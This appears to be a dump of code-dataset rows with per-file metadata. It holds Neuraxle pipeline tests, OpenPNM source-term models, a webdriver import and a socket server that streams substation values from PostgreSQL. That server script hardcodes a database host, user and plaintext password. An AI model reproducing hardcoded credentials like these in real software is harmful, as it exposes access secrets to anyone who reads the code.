            (DATA_INPUTS, EXPECTED_OUTPUTS)
        ],
        hyperparams={
            'ChooseOneOrManyStepsOf__a__enabled': True,
            'ChooseOneOrManyStepsOf__b__enabled': True
        },
        hyperparams_space={
            'ChooseOneOrManyStepsOf__a__enabled': Boolean(),
            'ChooseOneOrManyStepsOf__b__enabled': Boolean()
        },
        expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18, 0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
    )
@pytest.mark.parametrize('test_case', [
    create_test_case_fit_transform_single_step_choosen(),
    create_test_case_fit_transform_multiple_steps_choosen()
])
def test_choose_one_or_many_step_of_fit_transform_should_choose_step(
        test_case: NeuraxleTestCase):
    """fit_transform must run only the enabled steps."""
    pipeline = test_case.pipeline
    pipeline.set_hyperparams_space(test_case.hyperparams_space)
    pipeline.set_hyperparams(test_case.hyperparams)
    pipeline, outputs = pipeline.fit_transform(DATA_INPUTS, EXPECTED_OUTPUTS)
    assert np.array_equal(outputs, test_case.expected_processed_outputs)
    assert_callback_data_is_as_expected(test_case)
@pytest.mark.parametrize('test_case', [
    create_test_case_fit_single_step_choosen(),
    create_test_case_fit_multiple_steps_choosen()
])
def test_choose_one_or_many_step_of_fit_should_choose_step(
        test_case: NeuraxleTestCase):
    """fit must invoke the fit callbacks of enabled steps only."""
    pipeline = test_case.pipeline
    pipeline.set_hyperparams_space(test_case.hyperparams_space)
    pipeline.set_hyperparams(test_case.hyperparams)
    pipeline = pipeline.fit(DATA_INPUTS, EXPECTED_OUTPUTS)
    assert_callback_data_is_as_expected(test_case)
def choose_one_step_single_step_chosen_fit_transform():
    """ChooseOneStepOf fit_transform case: step 'a' chosen, 'b' never runs.

    NOTE(review): the hyperparam key says 'Pipeline__ChooseOneOrManyStepsOf'
    while the pipeline uses ChooseOneStepOf — confirm the key resolves.
    """
    a_callback = TapeCallbackFunction()
    b_callback = TapeCallbackFunction()
    c_callback = TapeCallbackFunction()
    d_callback = TapeCallbackFunction()
    return NeuraxleTestCase(
        pipeline=Pipeline([
            ChooseOneStepOf([
                ('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
                ('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
            ]),
        ]),
        callbacks=[a_callback, c_callback, b_callback, d_callback],
        expected_callbacks_data=[
            DATA_INPUTS,
            (DATA_INPUTS, EXPECTED_OUTPUTS),
            [],
            []
        ],
        hyperparams={
            'Pipeline__ChooseOneOrManyStepsOf__choice': 'a'
        },
        expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
    )
def choose_one_step_single_step_chosen_fit():
    """ChooseOneStepOf fit-only case: step 'a' chosen; only its fit callback
    (c_callback) records data."""
    a_callback = TapeCallbackFunction()
    b_callback = TapeCallbackFunction()
    c_callback = TapeCallbackFunction()
    d_callback = TapeCallbackFunction()
    return NeuraxleTestCase(
        pipeline=Pipeline([
            ChooseOneStepOf([
                ('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
                ('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
            ]),
        ]),
        callbacks=[a_callback, c_callback, b_callback, d_callback],
        expected_callbacks_data=[
            [],
            (DATA_INPUTS, EXPECTED_OUTPUTS),
            [],
            []
        ],
        hyperparams={
            'ChooseOneOrManyStepsOf__choice': 'a'
        },
        expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
    )
def choose_one_step_single_step_chosen_transform():
    """ChooseOneStepOf transform-only case: step 'a' chosen; only its
    transform callback (a_callback) records data."""
    a_callback = TapeCallbackFunction()
    b_callback = TapeCallbackFunction()
    c_callback = TapeCallbackFunction()
    d_callback = TapeCallbackFunction()
    return NeuraxleTestCase(
        pipeline=Pipeline([
            ChooseOneStepOf([
                ('a', FitTransformCallbackStep(a_callback, c_callback, transform_function=lambda di: di * 2)),
                ('b', FitTransformCallbackStep(b_callback, d_callback, transform_function=lambda di: di * 2))
            ]),
        ]),
        callbacks=[a_callback, c_callback, b_callback, d_callback],
        expected_callbacks_data=[
            DATA_INPUTS,
            [],
            [],
            []
        ],
        hyperparams={
            'ChooseOneOrManyStepsOf__choice': 'a'
        },
        expected_processed_outputs=np.array([0, 2, 4, 6, 8, 10, 12, 14, 16, 18])
    )
@pytest.mark.parametrize('test_case', [
    choose_one_step_single_step_chosen_fit_transform()
])
def test_choose_one_step_of_fit_transform_should_choose_step(
        test_case: NeuraxleTestCase):
    """fit_transform on ChooseOneStepOf must run only the chosen step."""
    pipeline = test_case.pipeline
    pipeline.set_hyperparams(test_case.hyperparams)
    pipeline, outputs = pipeline.fit_transform(DATA_INPUTS, EXPECTED_OUTPUTS)
    assert np.array_equal(outputs, test_case.expected_processed_outputs)
    assert_callback_data_is_as_expected(test_case)
@pytest.mark.parametrize('test_case', [
    choose_one_step_single_step_chosen_fit()
])
def test_choose_one_step_of_fit_should_choose_step(test_case: NeuraxleTestCase):
    """fit must route the fit data through the chosen step only."""
    pipeline = test_case.pipeline
    pipeline.set_hyperparams(test_case.hyperparams)

    pipeline = pipeline.fit(DATA_INPUTS, EXPECTED_OUTPUTS)

    assert_callback_data_is_as_expected(test_case)
@pytest.mark.parametrize('test_case', [
    choose_one_step_single_step_chosen_transform()
])
def test_choose_one_step_of_transform_should_choose_step(test_case: NeuraxleTestCase):
    """transform must route data through the chosen step only.

    Renamed from ``test_choose_one_step_of_fit_should_choose_step``: that name
    duplicated the fit test defined just above, so this definition rebound the
    module attribute and pytest silently never collected the fit variant.
    """
    p = test_case.pipeline
    p.set_hyperparams(test_case.hyperparams)

    p = p.transform(DATA_INPUTS)

    assert_callback_data_is_as_expected(test_case)
def test_choose_one_step_of_invalid_chosen_step():
    """Choosing a step name that does not exist must raise ValueError."""
    with pytest.raises(ValueError):
        Pipeline([
            ChooseOneStepOf([('a', Identity()), ('b', Identity())]).set_hyperparams({'choice': 'c'}),
        ])
@pytest.mark.parametrize("method_name, args, kwargs", [
    ("set_hyperparams", [{'choice': 'b'}], {}),
    ("update_hyperparams", [{'choice': 'b'}], {}),
    ("apply", ["_update_hyperparams"], {"hyperparams": {'choice': 'b'}})  # mirrors the hyperparams update performed by an AutoML loop
])
def test_choose_one_step_of_set_hyperparams(method_name, args, kwargs):
    """Updating the 'choice' hyperparameter must re-route data to step 'b'."""
    a_transform_tape = TapeCallbackFunction()
    a_fit_tape = TapeCallbackFunction()
    b_transform_tape = TapeCallbackFunction()
    b_fit_tape = TapeCallbackFunction()
    double = lambda di: di * 2
    choose_one_step_of = ChooseOneStepOf([
        ('a', FitTransformCallbackStep(a_transform_tape, a_fit_tape, transform_function=double).set_name("step_1")),
        ('b', FitTransformCallbackStep(b_transform_tape, b_fit_tape, transform_function=double).set_name("step_1")),
    ])
    p = Pipeline([choose_one_step_of])

    # With the default choice ('a'), only step a's transform tape records data.
    p.transform(DATA_INPUTS)
    tapes = (a_transform_tape, b_transform_tape, a_fit_tape, b_fit_tape)
    assert [len(t.data) for t in tapes] == [1, 0, 0, 0]
    assert all(a_transform_tape.data[0] == DATA_INPUTS)

    # Switch the choice to 'b' through the method under test.
    getattr(choose_one_step_of, method_name)(*args, **kwargs)

    p.transform(DATA_INPUTS)
    assert [len(t.data) for t in tapes] == [1, 1, 0, 0]
    assert all(a_transform_tape.data[0] == DATA_INPUTS)
    assert all(b_transform_tape.data[0] == DATA_INPUTS)
def test_choose_one_step_of_update_hyperparams():
    """update_hyperparams({'choice': 'b'}) must re-route data to step 'b'."""
    a_transform_tape = TapeCallbackFunction()
    a_fit_tape = TapeCallbackFunction()
    b_transform_tape = TapeCallbackFunction()
    b_fit_tape = TapeCallbackFunction()
    double = lambda di: di * 2
    choose_one_step_of = ChooseOneStepOf([
        ('a', FitTransformCallbackStep(a_transform_tape, a_fit_tape, transform_function=double).set_name("step_1")),
        ('b', FitTransformCallbackStep(b_transform_tape, b_fit_tape, transform_function=double).set_name("step_1")),
    ])
    p = Pipeline([choose_one_step_of])

    # With the default choice ('a'), only step a's transform tape records data.
    p.transform(DATA_INPUTS)
    tapes = (a_transform_tape, b_transform_tape, a_fit_tape, b_fit_tape)
    assert [len(t.data) for t in tapes] == [1, 0, 0, 0]
    assert all(a_transform_tape.data[0] == DATA_INPUTS)

    choose_one_step_of.update_hyperparams({'choice': 'b'})

    p.transform(DATA_INPUTS)
    assert [len(t.data) for t in tapes] == [1, 1, 0, 0]
    assert all(a_transform_tape.data[0] == DATA_INPUTS)
    assert all(b_transform_tape.data[0] == DATA_INPUTS)
| 35.229412
| 127
| 0.659431
| 1,887
| 17,967
| 5.879703
| 0.056704
| 0.038936
| 0.058585
| 0.072645
| 0.909419
| 0.902569
| 0.880577
| 0.873997
| 0.852636
| 0.844164
| 0
| 0.01864
| 0.238604
| 17,967
| 509
| 128
| 35.298625
| 0.792398
| 0.00295
| 0
| 0.773893
| 0
| 0
| 0.079556
| 0.066324
| 0
| 0
| 0
| 0
| 0.079254
| 1
| 0.048951
| false
| 0
| 0.020979
| 0
| 0.095571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
646ffb899f12c5c91a2bba441154ea2bc6aa3775
| 16,005
|
py
|
Python
|
OpenPNM/Physics/models/generic_source_term.py
|
thirtywang/OpenPNM
|
e55ee7ae69a8be3e2b0e6bf24c9ff92b6d24e16a
|
[
"MIT"
] | 1
|
2021-03-30T21:38:26.000Z
|
2021-03-30T21:38:26.000Z
|
OpenPNM/Physics/models/generic_source_term.py
|
thirtywang/OpenPNM
|
e55ee7ae69a8be3e2b0e6bf24c9ff92b6d24e16a
|
[
"MIT"
] | null | null | null |
OpenPNM/Physics/models/generic_source_term.py
|
thirtywang/OpenPNM
|
e55ee7ae69a8be3e2b0e6bf24c9ff92b6d24e16a
|
[
"MIT"
] | 1
|
2020-07-02T02:21:10.000Z
|
2020-07-02T02:21:10.000Z
|
r"""
===============================================================================
Submodule -- generic_source_term
===============================================================================
"""
import scipy as _sp
def linear(physics, phase, A1='', A2='', x='', return_rate=True, **kwargs):
    r"""
    For the following source term:

        .. math::
            r = A_{1} x + A_{2}

    If return_rate is True, it returns the value of the source term for the
    provided x in each pore.
    If return_rate is False, it calculates the slope and intercept for the
    following linear form:

        .. math::
            r = S_{1} x + S_{2}

    Parameters
    ----------
    A1 , A2 : string
        The property name of the coefficients in the source term model.
        With A2 set to zero this equation takes on the familiar form of r=kx.
    x : string or float/int or array/list
        The property name or numerical value or array for the main quantity

    Notes
    -----
    Because this source term is linear in concentration (x) it is not
    necessary to iterate during the solver step.  Thus, when using the
    ``set_source_term`` method for an algorithm, it is recommended to set the
    ``maxiter`` argument to 0.  This saves one unnecessary solution of the
    system, since the solution would converge after the first pass anyway.
    """
    # FIX: the original used ``x is ''`` / ``A is ''`` -- identity comparison
    # against a str literal is implementation-dependent (SyntaxWarning on
    # CPython >= 3.8); use equality and isinstance instead.
    if isinstance(x, str):
        if x == '':
            # No quantity supplied yet: return NaNs of the right length.
            X = _sp.ones(physics.Np) * _sp.nan
        else:
            x = 'pore.' + x.split('.')[-1]
            try:
                X = physics[x]
            except KeyError:
                raise Exception(physics.name +
                                ' does not have the pore property :' + x + '!')
    else:
        X = _sp.array(x)
        length_X = _sp.size(X)
        if length_X != physics.Np:
            if length_X == 1:
                X = X * _sp.ones(physics.Np)
            elif length_X >= phase.Np:
                # Phase-sized array: take this physics object's subset of pores.
                X = X[physics.map_pores()]
            else:
                raise Exception('Wrong size for the numerical array of x!')
    # Resolve the coefficients: '' -> 0, property name -> pore array.
    a = {}
    for ind, A in enumerate([A1, A2]):
        if not isinstance(A, str):
            raise Exception('source_term parameters can only be string '
                            'type!')
        if A == '':
            a[str(ind + 1)] = 0
        else:
            A = 'pore.' + A.split('.')[-1]
            try:
                a[str(ind + 1)] = physics[A]
            except KeyError:
                raise Exception(physics.name + '/' + phase.name +
                                ' does not have the pore property :' +
                                A + '!')
    if return_rate:
        return a['1'] * X + a['2']
    S1 = a['1']
    S2 = a['2']
    return _sp.vstack((S1, S2)).T
def power_law(physics, phase, A1='', A2='', A3='', x='',
              return_rate=True, **kwargs):
    r"""
    For the following source term:

        .. math::
            r = A_{1} x^{A_{2}} + A_{3}

    If return_rate is True, it returns the value of the source term for the
    provided x in each pore.
    If return_rate is False, it calculates the slope and intercept for the
    following linear form:

        .. math::
            r = S_{1} x + S_{2}

    Parameters
    ----------
    A1 -> A3 : string
        The property name of the coefficients in the source term model
    x : string or float/int or array/list
        The property name or numerical value or array for the main quantity
    """
    # FIX: replaced ``is ''`` identity comparisons and ``type(...) == str``
    # with equality / isinstance checks (SyntaxWarning on CPython >= 3.8).
    if isinstance(x, str):
        if x == '':
            # No quantity supplied yet: return NaNs of the right length.
            X = _sp.ones(physics.Np) * _sp.nan
        else:
            x = 'pore.' + x.split('.')[-1]
            try:
                X = physics[x]
            except KeyError:
                raise Exception(physics.name +
                                ' does not have the pore property :' + x + '!')
    else:
        X = _sp.array(x)
        length_X = _sp.size(X)
        if length_X != physics.Np:
            if length_X == 1:
                X = X * _sp.ones(physics.Np)
            elif length_X >= phase.Np:
                # Phase-sized array: take this physics object's subset of pores.
                X = X[physics.map_pores()]
            else:
                raise Exception('Wrong size for the numerical array of x!')
    # Resolve the coefficients: '' -> 0, property name -> pore array.
    a = {}
    for ind, A in enumerate([A1, A2, A3]):
        if not isinstance(A, str):
            raise Exception('source_term parameters can only be string '
                            'type!')
        if A == '':
            a[str(ind + 1)] = 0
        else:
            A = 'pore.' + A.split('.')[-1]
            try:
                a[str(ind + 1)] = physics[A]
            except KeyError:
                raise Exception(physics.name + '/' + phase.name +
                                ' does not have the pore property :' +
                                A + '!')
    if return_rate:
        return a['1'] * X ** a['2'] + a['3']
    # Linearization: S1 = dr/dx, S2 = r - S1 * x.
    S1 = a['1'] * a['2'] * X ** (a['2'] - 1)
    S2 = a['1'] * X ** a['2'] * (1 - a['2']) + a['3']
    return _sp.vstack((S1, S2)).T
def exponential(physics, phase, A1='', A2='', A3='', A4='', A5='', A6='',
                x='', return_rate=True, **kwargs):
    r"""
    For the following source term:

        .. math::
            r = A_{1} A_{2}^{( A_{3} x^{ A_{4} } + A_{5})} + A_{6}

    If return_rate is True, it returns the value of the source term for the
    provided x in each pore.
    If return_rate is False, it calculates the slope and intercept for the
    following linear form:

        .. math::
            r = S_{1} x + S_{2}

    Parameters
    ----------
    A1 -> A6 : string
        The property name of the coefficients in the source term model
    x : string or float/int or array/list
        The property name or numerical value or array for the main quantity
    """
    # FIX: replaced ``is ''`` identity comparisons and ``type(...) == str``
    # with equality / isinstance checks (SyntaxWarning on CPython >= 3.8).
    if isinstance(x, str):
        if x == '':
            # No quantity supplied yet: return NaNs of the right length.
            X = _sp.ones(physics.Np) * _sp.nan
        else:
            x = 'pore.' + x.split('.')[-1]
            try:
                X = physics[x]
            except KeyError:
                raise Exception(physics.name +
                                ' does not have the pore property :' + x + '!')
    else:
        X = _sp.array(x)
        length_X = _sp.size(X)
        if length_X != physics.Np:
            if length_X == 1:
                X = X * _sp.ones(physics.Np)
            elif length_X >= phase.Np:
                # Phase-sized array: take this physics object's subset of pores.
                X = X[physics.map_pores()]
            else:
                raise Exception('Wrong size for the numerical array of x!')
    # Resolve the coefficients: A1 defaults to 1 (multiplicative), the rest
    # default to 0; property names are looked up as pore arrays.
    a = {}
    for ind, A in enumerate([A1, A2, A3, A4, A5, A6]):
        if not isinstance(A, str):
            raise Exception('source_term parameters can only be string '
                            'type!')
        if A == '':
            a[str(ind + 1)] = 1 if ind == 0 else 0
        else:
            A = 'pore.' + A.split('.')[-1]
            try:
                a[str(ind + 1)] = physics[A]
            except KeyError:
                raise Exception(physics.name + '/' + phase.name +
                                ' does not have the pore property :' +
                                A + '!')
    if return_rate:
        return a['1'] * a['2'] ** (a['3'] * X ** a['4'] + a['5']) + a['6']
    # Linearization: S1 = dr/dx, S2 = r - S1 * x.
    S1 = a['1'] * a['3'] * a['4'] * \
        X ** (a['4'] - 1) * _sp.log(a['2']) * \
        a['2'] ** (a['3'] * X ** a['4'] + a['5'])
    S2 = a['1'] * a['2'] ** (a['3'] * X ** a['4'] + a['5']) * \
        (1 - a['3'] * a['4'] * _sp.log(a['2']) * X ** a['4']) + a['6']
    return _sp.vstack((S1, S2)).T
def natural_exponential(physics, phase, A1='', A2='', A3='', A4='', A5='',
                        x='', return_rate=True, **kwargs):
    r"""
    For the following source term:

        .. math::
            r = A_{1} exp( A_{2} x^{ A_{3} } + A_{4} ) + A_{5}

    If return_rate is True, it returns the value of the source term for the
    provided x in each pore.
    If return_rate is False, it calculates the slope and intercept for the
    following linear form:

        .. math::
            r = S_{1} x + S_{2}

    Parameters
    ----------
    A1 -> A5 : string
        The property name of the coefficients in the source term model
    x : string or float/int or array/list
        The property name or numerical value or array for the main quantity
    """
    # FIX: replaced ``is ''`` identity comparisons and ``type(...) == str``
    # with equality / isinstance checks (SyntaxWarning on CPython >= 3.8).
    if isinstance(x, str):
        if x == '':
            # No quantity supplied yet: return NaNs of the right length.
            X = _sp.ones(physics.Np) * _sp.nan
        else:
            x = 'pore.' + x.split('.')[-1]
            try:
                X = physics[x]
            except KeyError:
                raise Exception(physics.name +
                                ' does not have the pore property :' + x + '!')
    else:
        X = _sp.array(x)
        length_X = _sp.size(X)
        if length_X != physics.Np:
            if length_X == 1:
                X = X * _sp.ones(physics.Np)
            elif length_X >= phase.Np:
                # Phase-sized array: take this physics object's subset of pores.
                X = X[physics.map_pores()]
            else:
                raise Exception('Wrong size for the numerical array of x!')
    # Resolve the coefficients: A1 defaults to 1 (multiplicative), the rest
    # default to 0; property names are looked up as pore arrays.
    a = {}
    for ind, A in enumerate([A1, A2, A3, A4, A5]):
        if not isinstance(A, str):
            raise Exception('source_term parameters can only be string '
                            'type!')
        if A == '':
            a[str(ind + 1)] = 1 if ind == 0 else 0
        else:
            A = 'pore.' + A.split('.')[-1]
            try:
                a[str(ind + 1)] = physics[A]
            except KeyError:
                raise Exception(physics.name + '/' + phase.name +
                                ' does not have the pore property :' +
                                A + '!')
    if return_rate:
        return a['1'] * _sp.exp(a['2'] * X ** a['3'] + a['4']) + a['5']
    # Linearization: S1 = dr/dx, S2 = r - S1 * x.
    S1 = a['1'] * a['2'] * \
        a['3'] * X ** (a['3'] - 1) * \
        _sp.exp(a['2'] * X ** a['3'] + a['4'])
    S2 = a['1'] * (1 - a['2'] * a['3'] * X ** a['3']) * \
        _sp.exp(a['2'] * X ** a['3'] + a['4']) + a['5']
    return _sp.vstack((S1, S2)).T
def logarithm(physics, phase, A1='', A2='', A3='', A4='', A5='', A6='',
              x='', return_rate=True, **kwargs):
    r"""
    For the following source term:

        .. math::
            r = A_{1} Log_{ A_{2} }( A_{3} x^{ A_{4} } + A_{5}) + A_{6}

    If return_rate is True, it returns the value of the source term for the
    provided x in each pore.
    If return_rate is False, it calculates the slope and intercept for the
    following linear form:

        .. math::
            r = S_{1} x + S_{2}

    Parameters
    ----------
    A1 -> A6 : string
        The property name of the coefficients in the source term model
    x : string or float/int or array/list
        The property name or numerical value or array for the main quantity
    """
    # FIX: replaced ``is ''`` identity comparisons and ``type(...) == str``
    # with equality / isinstance checks (SyntaxWarning on CPython >= 3.8).
    if isinstance(x, str):
        if x == '':
            # No quantity supplied yet: return NaNs of the right length.
            X = _sp.ones(physics.Np) * _sp.nan
        else:
            x = 'pore.' + x.split('.')[-1]
            try:
                X = physics[x]
            except KeyError:
                raise Exception(physics.name +
                                ' does not have the pore property :' + x + '!')
    else:
        X = _sp.array(x)
        length_X = _sp.size(X)
        if length_X != physics.Np:
            if length_X == 1:
                X = X * _sp.ones(physics.Np)
            elif length_X >= phase.Np:
                # Phase-sized array: take this physics object's subset of pores.
                X = X[physics.map_pores()]
            else:
                raise Exception('Wrong size for the numerical array of x!')
    # Resolve the coefficients: A1 defaults to 1 (multiplicative), the rest
    # default to 0; property names are looked up as pore arrays.
    a = {}
    for ind, A in enumerate([A1, A2, A3, A4, A5, A6]):
        if not isinstance(A, str):
            raise Exception('source_term parameters can only be string '
                            'type!')
        if A == '':
            a[str(ind + 1)] = 1 if ind == 0 else 0
        else:
            A = 'pore.' + A.split('.')[-1]
            try:
                a[str(ind + 1)] = physics[A]
            except KeyError:
                raise Exception(physics.name + '/' + phase.name +
                                ' does not have the pore property :' +
                                A + '!')
    if return_rate:
        # Log base A2 via the change-of-base identity: log_b(y) = ln(y)/ln(b).
        return (a['1'] * _sp.log(a['3'] * X ** a['4'] + a['5']) /
                _sp.log(a['2']) + a['6'])
    # Linearization: S1 = dr/dx, S2 = r - S1 * x.
    S1 = a['1'] * a['3'] * a['4'] * \
        X ** (a['4'] - 1) / \
        (_sp.log(a['2']) * (a['3'] * X ** a['4'] + a['5']))
    S2 = a['1'] * _sp.log(a['3'] * X ** a['4'] + a['5']) / \
        _sp.log(a['2']) + a['6'] - a['1'] * a['3'] * \
        a['4'] * X ** a['4'] / \
        (_sp.log(a['2']) * (a['3'] * X ** a['4'] + a['5']))
    return _sp.vstack((S1, S2)).T
def natural_logarithm(physics, phase, A1='', A2='', A3='', A4='', A5='',
                      x='', return_rate=True, **kwargs):
    r"""
    For the following source term:

        .. math::
            r = A_{1} Ln( A_{2} x^{ A_{3} } + A_{4}) + A_{5}

    If return_rate is True, it returns the value of the source term for the
    provided x in each pore.
    If return_rate is False, it calculates the slope and intercept for the
    following linear form:

        .. math::
            r = S_{1} x + S_{2}

    Parameters
    ----------
    A1 -> A5 : string
        The property name of the coefficients in the source term model
    x : string or float/int or array/list
        The property name or numerical value or array for the main quantity
    """
    # FIX: replaced ``is ''`` identity comparisons and ``type(...) == str``
    # with equality / isinstance checks (SyntaxWarning on CPython >= 3.8).
    if isinstance(x, str):
        if x == '':
            # No quantity supplied yet: return NaNs of the right length.
            X = _sp.ones(physics.Np) * _sp.nan
        else:
            x = 'pore.' + x.split('.')[-1]
            try:
                X = physics[x]
            except KeyError:
                raise Exception(physics.name +
                                ' does not have the pore property :' + x + '!')
    else:
        X = _sp.array(x)
        length_X = _sp.size(X)
        if length_X != physics.Np:
            if length_X == 1:
                X = X * _sp.ones(physics.Np)
            elif length_X >= phase.Np:
                # Phase-sized array: take this physics object's subset of pores.
                X = X[physics.map_pores()]
            else:
                raise Exception('Wrong size for the numerical array of x!')
    # Resolve the coefficients: A1 defaults to 1 (multiplicative), the rest
    # default to 0; property names are looked up as pore arrays.
    a = {}
    for ind, A in enumerate([A1, A2, A3, A4, A5]):
        if not isinstance(A, str):
            raise Exception('source_term parameters can only be string '
                            'type!')
        if A == '':
            a[str(ind + 1)] = 1 if ind == 0 else 0
        else:
            A = 'pore.' + A.split('.')[-1]
            try:
                a[str(ind + 1)] = physics[A]
            except KeyError:
                raise Exception(physics.name + '/' + phase.name +
                                ' does not have the pore property :' +
                                A + '!')
    if return_rate:
        return a['1'] * _sp.log(a['2'] * X ** a['3'] + a['4']) + a['5']
    # Linearization: S1 = dr/dx, S2 = r - S1 * x.
    S1 = a['1'] * a['2'] * a['3'] * \
        X ** (a['3'] - 1) / \
        (a['2'] * X ** a['3'] + a['4'])
    S2 = a['1'] * _sp.log(a['2'] * X ** a['3'] + a['4']) + \
        a['5'] - a['1'] * a['2'] * a['3'] * \
        X ** a['3'] / (a['2'] * X ** a['3'] + a['4'])
    return _sp.vstack((S1, S2)).T
| 33.62395
| 79
| 0.43905
| 2,069
| 16,005
| 3.305945
| 0.070082
| 0.011111
| 0.031579
| 0.018713
| 0.937866
| 0.933041
| 0.927193
| 0.919152
| 0.906871
| 0.90424
| 0
| 0.031136
| 0.4
| 16,005
| 475
| 80
| 33.694737
| 0.681141
| 0.249422
| 0
| 0.848875
| 0
| 0
| 0.098382
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019293
| false
| 0
| 0.003215
| 0
| 0.025723
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64a32849f326d9af8291a6a179457e91dc4863b3
| 139
|
py
|
Python
|
eats/webdriver/__init__.py
|
Etiqa/eats
|
8c8e2da93d0014f6fbb208185712c5526dba1174
|
[
"BSD-2-Clause"
] | null | null | null |
eats/webdriver/__init__.py
|
Etiqa/eats
|
8c8e2da93d0014f6fbb208185712c5526dba1174
|
[
"BSD-2-Clause"
] | 5
|
2021-03-18T21:34:44.000Z
|
2022-03-11T23:35:23.000Z
|
eats/webdriver/__init__.py
|
Etiqa/eats
|
8c8e2da93d0014f6fbb208185712c5526dba1174
|
[
"BSD-2-Clause"
] | null | null | null |
from .webdriver import EatsWebDriver, SeleniumWebDriver, PytractorWebDriver, AppiumWebDriver, PytractorAppiumWebDriver, web_driver_factory
| 69.5
| 138
| 0.892086
| 11
| 139
| 11.090909
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064748
| 139
| 1
| 139
| 139
| 0.938462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
64be493fdf14a942d5bd18cc26e98d47ee4037f8
| 14,868
|
py
|
Python
|
r07.py
|
netlabcode/reader
|
9d42bef6ccb35266abec87db5a2df9bc9d77c355
|
[
"Apache-2.0"
] | null | null | null |
r07.py
|
netlabcode/reader
|
9d42bef6ccb35266abec87db5a2df9bc9d77c355
|
[
"Apache-2.0"
] | null | null | null |
r07.py
|
netlabcode/reader
|
9d42bef6ccb35266abec87db5a2df9bc9d77c355
|
[
"Apache-2.0"
] | null | null | null |
import psycopg2
from datetime import datetime
import binascii
import _thread
import time
import socket
PORT1 = 8807
def serverX():
    """Stream value changes of database objects 51-66 (Substation 7) to one TCP client.

    Accepts a single client on PORT1, snapshots the current ``value`` and
    ``code`` of objects 51-66, then polls the database once per second and
    sends ``"<prefix>_<code>+<value>"`` for every object whose value changed,
    plus a one-byte "a" keep-alive each cycle.  On any database/send error the
    connections are closed and the server restarts itself (tail recursion, as
    in the original -- NOTE(review): each restart adds a stack frame).

    Fixes over the original unrolled version:
      * 16 copy-pasted query/compare/send blocks collapsed into one loop;
      * bare ``except:`` narrowed to ``except Exception`` so KeyboardInterrupt
        and SystemExit are no longer swallowed;
      * SQL is parameterized via psycopg2 placeholders instead of string ids.
    """
    # Object ids 51-66 paired with the merging-unit prefix used in the
    # outgoing message.  The mapping (including the "mu10" entries for ids
    # 52-54 and "mu08" for ids 64-66) reproduces the original code exactly.
    ids = list(range(51, 67))
    prefixes = ["mu01", "mu10", "mu10", "mu10", "mu02", "mu02", "mu03",
                "mu03", "mu04", "mu04", "mu05", "mu06", "mu07", "mu08",
                "mu08", "mu08"]
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s1:
        s1.bind(('', PORT1))
        s1.listen()
        conn1, addr = s1.accept()
        with conn1:
            print('Server Substation 7 from:', addr)
            conn = psycopg2.connect(host="131.180.165.7", database="CRoF",
                                    user="postgres", password="crpg")
            cursor = conn.cursor()
            # Snapshot the current values and message codes for ids 51-66.
            records = {}
            codes = {}
            for obj_id in ids:
                cursor.execute('SELECT value from objects WHERE id=%s',
                               (obj_id,))
                records[obj_id] = cursor.fetchone()[0]
                cursor.execute('SELECT code from objects WHERE id=%s',
                               (obj_id,))
                codes[obj_id] = cursor.fetchone()[0]
            keepalive = "a".encode()
            while True:
                try:
                    # Message format: <prefix>_<code>+<value>
                    for obj_id, prefix in zip(ids, prefixes):
                        cursor.execute('SELECT value from objects WHERE id=%s',
                                       (obj_id,))
                        value = cursor.fetchone()[0]
                        if records[obj_id] != value:
                            print(value)
                            message = prefix + "_" + str(codes[obj_id]) + \
                                "+" + str(value)
                            conn1.sendall(message.encode())
                            print(message)
                            records[obj_id] = value
                    conn1.sendall(keepalive)
                    time.sleep(1)
                except Exception:
                    # Client went away or the DB failed: tear down and break
                    # out so the restart logic below runs.
                    conn1.close()
                    conn.close()
                    print("Connection Close Substation 7")
                    break
            conn1.close()
            print("Restart Server Substation 7")
            conn.close()
            s1.close()
            time.sleep(1)
            serverX()
serverX()
| 47.2
| 111
| 0.392521
| 1,188
| 14,868
| 4.895623
| 0.107744
| 0.115543
| 0.156809
| 0.148556
| 0.852304
| 0.852304
| 0.83511
| 0.83511
| 0.701513
| 0.701513
| 0
| 0.054147
| 0.509349
| 14,868
| 314
| 112
| 47.350318
| 0.743112
| 0.003968
| 0
| 0.671533
| 0
| 0
| 0.135758
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00365
| false
| 0.00365
| 0.021898
| 0
| 0.025547
| 0.127737
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
